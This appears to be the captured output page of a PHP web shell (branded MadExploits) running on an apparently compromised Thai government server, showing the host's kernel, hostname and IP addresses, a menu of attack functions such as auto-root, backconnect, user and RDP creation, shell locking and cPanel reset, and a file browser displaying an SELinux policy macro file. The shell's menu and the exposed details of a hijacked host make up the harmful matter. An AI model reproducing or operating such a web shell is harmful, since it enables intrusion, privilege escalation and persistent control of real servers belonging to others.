Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
selinux /
devel /
include /
support /
[ HOME SHELL ]
Name
Size
Permission
Action
all_perms.spt
14.82
KB
-rw-r--r--
divert.m4
12
B
-rw-r--r--
file_patterns.spt
12.37
KB
-rw-r--r--
ipc_patterns.spt
349
B
-rw-r--r--
loadable_module.spt
3.26
KB
-rw-r--r--
misc_macros.spt
1.68
KB
-rw-r--r--
misc_patterns.spt
1.45
KB
-rw-r--r--
mls_mcs_macros.spt
1.35
KB
-rw-r--r--
obj_perm_sets.spt
13.66
KB
-rw-r--r--
policy.dtd
1.36
KB
-rw-r--r--
segenxml.py
10.51
KB
-rw-r--r--
segenxml.pyc
7.4
KB
-rw-r--r--
segenxml.pyo
7.4
KB
-rw-r--r--
undivert.m4
6
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : misc_patterns.spt
# # Specified domain transition patterns # define(`domain_transition_pattern',` allow $1 $2:file { getattr open read execute }; allow $1 $3:process transition; dontaudit $1 $3:process { noatsecure siginh rlimitinh }; ') # compatibility: define(`domain_trans',`domain_transition_pattern($*)') define(`spec_domtrans_pattern',` allow $1 self:process setexec; domain_transition_pattern($1,$2,$3) allow $3 $1:fd use; allow $3 $1:fifo_file rw_inherited_fifo_file_perms; allow $3 $1:process sigchld; ') # # Automatic domain transition patterns # define(`domain_auto_transition_pattern',` domain_transition_pattern($1,$2,$3) type_transition $1 $2:process $3; ') # compatibility: define(`domain_auto_trans',`domain_auto_transition_pattern($*)') define(`domtrans_pattern',` domain_auto_transition_pattern($1,$2,$3) allow $3 $1:fd use; allow $3 $1:fifo_file rw_inherited_fifo_file_perms; allow $3 $1:process sigchld; ifdef(`hide_broken_symptoms', ` dontaudit $3 $1:socket_class_set { read write }; ') ') # # Other process permissions # define(`send_audit_msgs_pattern',` refpolicywarn(`$0($*) has been deprecated, please use logging_send_audit_msgs($1) instead.') allow $1 self:capability audit_write; allow $1 self:netlink_audit_socket { create_netlink_socket_perms nlmsg_relay }; ') define(`ps_process_pattern',` allow $1 $2:dir list_dir_perms; allow $1 $2:file read_file_perms; allow $1 $2:lnk_file read_lnk_file_perms; allow $1 $2:process getattr; ')
Close